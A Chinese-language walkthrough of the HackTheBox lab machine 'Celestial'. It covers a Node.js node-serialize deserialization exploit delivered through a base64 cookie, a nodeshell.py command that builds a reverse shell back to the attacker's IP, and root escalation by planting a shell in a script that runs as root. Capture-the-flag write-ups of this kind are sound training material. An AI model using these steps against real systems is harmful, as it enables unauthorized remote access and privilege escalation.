**
HackTheBox-Linux-Celestial-Walkthrough
**
靶機地址:https://www.hackthebox.eu/home/machines/profile/130
靶機難度:中級(4.8/10)
靶機發布日期:2018年8月25日
靶機描述:
Celestial is a medium difficulty machine which focuses on deserialization exploits. It is not the most realistic, however it provides a practical example of abusing client-size serialized objects in NodeJS framework.
作者:大餘
時間:2020-06-06
請注意:對於所有這些計算機,我是通過平臺授權允許情況進行滲透的。我將使用Kali Linux作爲解決該HTB的攻擊者機器。這裏使用的技術僅用於學習教育目的,如果列出的技術用於其他任何目標,我概不負責。
一、信息收集
可以看到靶機的IP是10.10.10.85…
Nmap發現了3000端口運行着http服務,Node.js框架…
剛進入發現404,查看前端源碼也沒信息…
在刷新頁面後更新了信息…顯示以上結果…前端還是沒信息…
burpsuit攔截髮現了一串base64值…
可以知道這是一個Node.js Express框架,根據輸出結果,可以修改cookie變換輸出值…
命令:echo eyJ1c2VybmFtZSI6IkR1bW15IiwiY291bnRyeSI6IklkayBQcm9iYWJseSBTb21ld2hlcmUgRHVtYiIsImNpdHkiOiJMYW1ldG93biIsIm51bSI6IjIifQ== | base64 -d | sed 's/"2"/"5"/g' | base64 -w0
通過"num":“2"更改"num”:"5"並使用base64對其進行了編碼輸入到burp中,輸出結果知道這是node-serialize模塊導致的…
這裏更直觀的看到這是由node-serialize模塊導致的,該模塊是在unserialize函數模塊中導致無法驗證用戶提供的輸入,從而執行了JSON值內的所有內容…
開始利用反序列化漏洞提權…
https://hd7exploit.wordpress.com/2017/05/29/exploiting-node-js-deserialization-bug-for-remote-code-execution-cve-2017-5941/
這裏詳細講述了node-serialize模塊的利用方式…
按照文章利用即可…
命令:sudo python nodeshell.py -r -h 10.10.14.51 -p 6666 -e -o
創建好shellcode…
然後利用burpsuit注入shell即可…
成功獲得反向外殼…
獲得了user_flag信息…
查看到還存在script.py腳本信息…
該腳本很可疑,我下載了pspy監測後端進程…上傳
果然發現了該程序是在運行了…但不是root權限?
查看了後端日誌後…發現該程序在執行root權限…嘗試植入shell
利用簡單shell,echo植入即可…
等待了好久…估計10分鐘…才獲得了反向外殼…pspy32監測一直沒運行script.py…
獲得了root權限,並獲得了root_flag信息…
簡單的提權…
由於我們已經成功得到root權限查看user和root.txt,因此完成這臺中級的靶機,希望你們喜歡這臺機器,請繼續關注大餘後期會有更多具有挑戰性的機器,一起練習學習。
如果你有其他的方法,歡迎留言。要是有寫錯了的地方,請你一定要告訴我。要是你覺得這篇博客寫的還不錯,歡迎分享給身邊的人。
